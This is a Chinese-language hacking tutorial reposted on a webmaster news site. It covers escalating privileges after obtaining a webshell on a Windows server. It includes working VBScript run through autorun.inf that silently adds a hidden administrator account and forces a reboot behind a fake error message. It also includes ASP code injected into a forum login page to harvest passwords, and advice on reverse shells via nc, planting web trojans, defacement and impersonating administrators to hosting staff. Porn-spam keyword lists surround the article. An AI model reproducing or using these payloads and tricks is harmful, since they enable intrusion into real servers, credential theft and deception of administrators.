精品免费在线观看-精品欧美-精品欧美成人bd高清在线观看-精品欧美高清不卡在线-精品欧美日韩一区二区

17站長網

17站長網 首頁 安全 入侵防御 查看內容

另類巧妙的思路:旁門左道的入侵方式詳解!

2022-9-26 12:48| 查看: 2204 |來源: 互聯網

很多的時候,入侵并不是單純靠技術的,有很多是運氣因素,更重要的是如何對一些擺在你面前的一些安全破綻的攻擊。我很相信安全意識這個東西,當一臺服務器擺在你面前時,大概的看下就知道服務器的安全到底如何了,特
很多的時候,入侵并不是單純靠技術的,有很多是運氣因素,更重要的是如何對一些擺在你面前的一些安全破綻的攻擊。我很相信安全意識這個東西,當一臺服務器擺在你面前時,大概的看下就知道服務器的安全到底如何了,特別是對于入侵之后的webshell的提升,更多的依賴于管理員的安全意識。由于本人的技術不好,不能自己發現溢出漏洞,所以在入侵時只能搞些旁門左道的東西了。也許這些都是被管理員和高手所不恥的,但是在實際中,這些伎倆的威脅不容忽視,你根本不知道什么時候你的系統就會變得到處是陷阱,加上安全意識薄弱一點的話,對系統的危害還是很大的,我就來說說我平時用到的一些旁門左道的方法吧。ù蠹乙院蟛灰梢曃揖托辛薧_^)
首先我們獲得一個webshell,因為我說的旁門左道主要就是用在得到webshell之后的權限提升,webshell相信大家手里都有一大把吧!沒有也沒有關系,腳本漏洞那么多,看看以前的文章自己上網找找吧!^_^。得到webshell以后,我一般都是先看看系統的進程列表,砍客的木馬和最近的海洋木馬都有這個功能。我用的就是海洋的修改版,可以看到很詳細的信息,你沒有這樣的木馬的話也沒有關系,我這里有別人給我的一段代碼,放到服務器上就可以看進程了: <%
dim obj //定義變量//
for each obj in getObject("WinNT://.") //循環取得系統本機對象//
err.clear //錯誤處理//
%>
<%=obj.Name%> //顯示對象Name屬性,即顯示系統用戶組//
<%if err then
else
%>(<%=obj.DisplayName%>)<%end if%> //顯示當前服務名//

<%=obj.path%> //顯示當前服務程序路徑// 保存為asp文件訪問看看吧!如圖一。這里要仔細看看,服務都裝在哪里,還有哪些服務,這樣就可以知道管理員的水平到底怎么樣了。如果你什么也沒有得到的話說明管理員不是很差勁,就要小心了!呵呵,服務都裝在默認的路徑下啊,默認Guest沒有什么權限,不過如果你發現有不在默認路徑下的服務,就試著執行命令看看,可以執行的話就可以把我們自己的程序傳上去改掉服務的名字,將自己的程序替換成他的(這里要求對方的程序路徑下是默認的權限哦)。windows默認是不允許刪除正在執行的文件但是可以改名,呵呵,這里只要服務器重起我們的程序就可以執行了,當然是以犧牲對方的服務為代價的了,建議搞瑞星之類的殺毒軟件。這里因為是要等服務器重起,但是一周左右都會重起的,概率很大,windows太不穩定了。呵呵,陰險吧,一切都是為了權限,不然怎么叫旁門左道呢?如果你真的比較性急,我也不建議你跑去D人家,是托管主機的話直接冒充管理員讓托管機房的人重起比較好,成功率據說很高的啊!前提是你要十分了解對方。當然,如果機器有Server-u并且版本比較低的話就不用那么麻煩了,如何提權就看看以前的文章吧,我就不多說了。但是看看這里,我們的情況不怎么好,看看服務的路徑就知道,就是幾個防火墻和殺毒軟件,全部默認啊,可以執行命令也沒有辦法替換服務了。我們再看看,好多默認的服務都沒有關,這是一個對安全重視的網管所不會做的,至少那個什么ClipBook服務就是個例子(排除對自己超級自信的網管。?梢钥闯鏊陌踩庾R至少不是那么到位,我們肯定有空子可以鉆的,哈哈!接著往后看吧,用Fso查看磁盤發現都可以瀏覽,還可寫,看來都是默認的設置,還可以執行命令,網管果然比較$#%$@$#%啊!其實開始我就應該知道,因為他的web頁面和數據庫都是默認設置,我就是那樣得到webshell的!基本可以確定我們的對手是怎么樣的一個人了!呵呵。
但是好象還是沒有什么用,可以執行命令,將nc傳上去還可以得到了反向的cmdshell,亂轉悠但還是沒有什么思路!管理員不懂做安全配置但是微軟的補丁不知道為什么打得很全,本地的溢出都不好用!郁悶。那就再在他的硬盤里看看,嘿嘿,根目錄可寫啊,想起什么了?記不記得系統默認的那個autorun.inf啊,放在磁盤根目錄,雙擊的話會執行那個指定程序的呵,我們就放個autorun.inf上去,哈哈。如圖二。這樣他的硬盤下就有我們放置的陷阱了,等管理員來了。當然,不能直接用autonrun.inf運行我們的木馬,這樣管理員打不開硬盤一定會奇怪的,我寫了個隱蔽點的代碼: Dim fso, MyFile //定義變量//
Set fso = createObject("Scripting.FileSystemObject") //取得Fso對象//
Set MyFile = fso.GetFile("d:\autorun.inf") //打開文件d:\autorun.inf//
MyFile.delete //刪除文件// dim sh //定義變量//
set sh=createobject("wscript.shell") //創建對象//
sh.run "net user jnc lxfxd /add",0 //Wsh執行命令添加帳戶jnc//
sh.run "net localgroup administrators jnc /add",0 //將jnc帳戶加為管理員//
sh.run "attrib h s d:\run.vbs",0 //將我們的run.vbs加上系統隱藏屬性//
sh.run "shutdown -r -t 30 -c windows讀盤錯誤,需要重新啟動以讀取分區表.",0 //重起機器,后面的是迷惑管理員// 保存為run.vbs,與后面的autorun.inf設置為隱藏之后一起放到磁盤根目錄下。如果是2000,可以把shutdown.exe傳上去,這些代碼的意思是先刪除autotun.inf,然后加jnc為管理員,最后彈出對話框,機器重起,重起后什么痕跡都沒有了,除了多個管理員用戶。提示信息可以自己改,迷惑性越大越好!在autorun.inf里寫上下面的代碼:
[autorun] OPEN=wscript run.vbs 一定要是wscript.exe啊,不然有黑的對話框出來就麻煩了。應該有高手知道如何用腳本打開磁盤的,但是我不會寫,不過這樣已經夠狠的了,想想現在有哪個打開磁盤時不是雙擊啊!
除了這個,還有個東西很值得提下,就是以前的黑x介紹的那個目錄欺騙工具,管理員誤以為是文件夾就可以加帳戶的那個。不過我得到的程序運行程序成功后總有個bat文件,刪不掉,是人都看出來有鬼!我就不要運行程序的功能了,直接傳到管理員去得多的地方,嘿嘿,根目錄下放一個,網站目錄放一個,……。如圖三,也不要太多了,放到管理員眼皮底下等他運行就可以了,我是不知道如何編程啊,不然寫個名字誘惑性更大的程序效果更好。我們有帳戶又有可以執行命令的cmdshell,沒有3389也可以用runas命令啊,這機器就是我們的了!可是這樣安全意識的管理員一般很懶,不一定會經常上線,不然不會這么多漏子。嘿嘿,不要著急,等什么都弄完了再想法讓他上線檢查自己的電腦,這樣才可以運行我們的程序。
再找找其他有不有空子可以鉆。去看看他網站上有什么東西吧,他這樣的管理員各個地方用的密碼不會都不一樣吧?網站上有個動網sp2的,把數據庫由asp的copy成mdb的下載下來看看。在Dv_log里沒有找到密碼,看到了注冊時間最早的那個家伙(這個當然就是管理員了自己!)的密碼,拿下來跑跑?墒前胩煲矝]有跑出來啊,急!我破解不出來我還不會等著你往我家里送?干脆找到了bbs的login.asp在里面加了點東西: <%
dim Name,password,fso,file //定義后面要用到的變量//
Name = Request("username") //取得瀏覽器傳過來的username變量//
Password = Request("password") //取得瀏覽器傳過來的Password變量//
Const ForReading = 1, ForWriting = 2, ForAppending = 8 //定義后面寫文件的參數//
Set fso = Server.createObject("Scripting.FileSystemObject") //取得Fso對象,準備寫文件//
Const path = "D:\mir3\bbs\admin_list.asp" //定義要寫的文件路徑//
set file=fso.opentextfile(path, ForAppending, TRUE) //取得文件對象//
file.write(Name) & " " //寫取得的用戶名//
file.write(Password) & "||" //寫取得的密碼,并用||分隔開//
file.close //關閉文件//
set file = nothing //釋放變量//
set fso = nothing //釋放變量//
%> 注意的是里面request的變量,具體的字段自己改!還有后面你要存放的文件地址,這個也根據情況自己填了,以后經常來看看得到的東西就行了,我比較關注的是admin!如圖四。又一個個陷阱挖好了,等管理員鉆了?墒呛孟蟛恢浪裁磿r候登陸呢,我干脆去當會壞人,發了幾個人身攻擊的帖子,灌了一會惡意的水就不信你管理員熬得住不上來刪帖子。ú皇俏业谋疽猓蠹以彛。┖俸
再轉悠了幾下子,發現C:\Program Files下有3721,乖乖,難道服務器還有人拿來上網。坎贿^也不排除那種可能,二話不說,找人要了最新的網頁木馬的代碼,找網站幾個關鍵的頁面插進去,如圖五哈哈,又是一個陷阱,只要你打開Ie上網!再找找,發現這個管理員還好,服務器上不聊QQ,也沒有什么游戲,要不然我們又可以給他捆上個東西,捆什么?當然是木馬了!我還真遇到有人在服務器聊QQ玩連連看外加看少兒不易的東西,呵呵,這樣的機器要是還搞不定就真是你的問題了。
這個機器上基本上已經到處是陷阱了,只等管理員上線了,我可等不急了,催催他吧!拿出經典的黑站圖片,插入網頁木馬在里面替換主頁黑了他!(這里我了解管理員的水平所以這么做的,大家千萬不要模仿。┚偷人l現了,我們的陷阱可是在等他的!可是這個網站好象人氣不怎么好,等了半天也沒有人清除黑頁。算了,中招是遲早的事了,你要是沒有耐心在網站上找下他的QQ告訴他,注意社會工程學的應用啊,呵呵。
這里還要說點其他的,得到webshell和權限有更好的辦法,上那個可以查詢網站信息的站點,http://www.webhosting.info查詢下他的信息,如圖六,注冊個相似的郵箱,或者直接打電話,然后冒充下站長說自己的密碼丟了,偶不怎么擅長這個,所以都是聽人家說的,可是上次跟小默上電信機房發現那里檢查真不是怎么嚴,簽個名就讓進去,進去之后還什么都不管。一些服務器就那樣開著,管理員已經登陸但是人不在,還有一些很重要的服務器都可以直接操作的,真不知道放個馬到網關上去會怎么樣,這里說的東西或許有些偏離黑客的技術了,但是,你敢保證這些旁門左道不會威脅到你的主機的安全?意識很重要,安全再怎么小心都不為過,好了,我就說到這里
本文最后更新于 2022-9-26 12:48,某些文章具有時效性,若有錯誤或已失效,請在網站留言或聯系站長:17tui@17tui.com
·END·
站長網微信號:w17tui,關注站長、創業、關注互聯網人 - 互聯網創業者營銷服務中心

免責聲明:本站部分文章和圖片均來自用戶投稿和網絡收集,旨在傳播知識,文章和圖片版權歸原作者及原出處所有,僅供學習與參考,請勿用于商業用途,如果損害了您的權利,請聯系我們及時修正或刪除。謝謝!

17站長網微信二維碼

始終以前瞻性的眼光聚焦站長、創業、互聯網等領域,為您提供最新最全的互聯網資訊,幫助站長轉型升級,為互聯網創業者提供更加優質的創業信息和品牌營銷服務,與站長一起進步!讓互聯網創業者不再孤獨!

掃一掃,關注站長網微信

大家都在看

    熱門排行

      最近更新

        返回頂部
        主站蜘蛛池模板: 国产成人在线视频观看 | 看一级黄色 | 久久91精品国产一区二区 | a免费国产一级特黄aa大 | 亚洲 欧美 手机 在线观看 | 国产欧美日韩综合精品二区 | 国产成人精品女人不卡在线 | 国产人妖视频一区在线观看 | 99久热re在线精品视频 | 国产精品国产精品国产三级普 | 国产不卡a | 久久逼网 | 国产色网站 | 精品一久久香蕉国产二月 | 国产美女一区精品福利视频 | 亚洲制服另类 | 日本一级特黄大一片免 | 欧美日韩中文字幕一区二区高清 | 国产网红在线视频 | 一级性生活视频 | 一级免费黄色毛片 | 校园春色国产精品 | 日本精品中文字幕有码 | 极品精品国产超清自在线观看 | 欧美+日本+国产+在线观看 | 国产精品v免费视频 | 久久99国产精品久久 | 欧美日韩国产成人高清视频 | 国产精品黄页网站在线播放免费 | 欧美视频第一页 | 看真人一级毛多毛片 | 精品在线免费观看视频 | 最近中文日本字幕免费完整 | 国产亚洲一区二区精品 | 韩国啪啪高清网站 | a级片黄色片| 伊人久久99亚洲精品久久频 | aaa级大片 | 亚欧成人一区二区 | 免费精品一区二区三区在线观看 | 99热这里只有精品国产免费 |